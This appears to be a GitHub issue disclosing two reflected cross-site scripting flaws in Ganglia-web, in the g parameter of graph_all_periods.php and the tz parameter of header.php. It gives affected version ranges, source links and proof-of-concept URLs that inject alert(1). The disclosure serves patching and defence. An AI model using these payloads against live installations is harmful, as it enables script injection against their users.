There are two xss in different version ranges

The first XSS release:   3.73<=Ganglia-web<3.75
Vulnerability cause: 
https://github.com/ganglia/ganglia-web/blob/3.7.3/graph_all_periods.php
The parameters passed in are not restricted, and the trigger point is the parameter g.
<img width="979" alt="Snipaste_2024-11-07_21-11-39" src="https://github.com/user-attachments/assets/25a6c391-91d7-48c2-a7ed-1a09e27564a3">
Vulnerability poc:
http://xxxxxx/ganglia//graph_all_periods.php?g=%22%22%20autofocus%20onfocus=alert(1)//%22

The second XSS release:    3.73<=Ganglia-web<=3.76
Vulnerability cause:  
https://github.com/ganglia/ganglia-web/blob/master/header.php
The parameters passed in are not restricted, and the trigger point is the parameter tz.
<img width="931" alt="Snipaste_2024-11-07_21-14-31" src="https://github.com/user-attachments/assets/592f331d-7a37-47db-a6fb-079bed6e2efc">
Vulnerability poc:
http://xxxx/ganglia/?tz=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://xxxx/?tz=%22%3E%3Cscript%3Ealert(1)%3C/script%3E


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

There are two xss in different version ranges #382

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

There are two xss in different version ranges #382

Description

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions